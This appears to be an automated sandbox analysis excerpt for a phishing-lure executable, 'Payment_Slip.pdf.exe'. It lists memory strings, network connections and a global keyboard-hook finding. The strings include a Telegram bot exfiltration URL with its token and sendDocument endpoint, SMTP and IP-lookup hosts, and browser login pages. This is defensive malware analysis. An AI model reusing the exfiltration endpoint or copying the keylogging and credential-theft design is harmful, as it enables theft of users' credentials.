Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/wr20%
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1242727523.0000000003157000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003195000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.gmail.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242122397.0000000001354000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Windows Update.exe, 0000001A.00000002.3620793390.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://XlYyZVevQktG2Dz.org
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://XlYyZVevQktG2Dz.orgX
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://XlYyZVevQktG2Dz.orgt-
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: Payment_Slip.pdf.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.10.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003171000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003179000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003175000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003166000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003398000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.000000000342E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/a/answer/166852
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Payment_Slip.pdf.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000

11_2_00409340

Installs a global keyboard hook

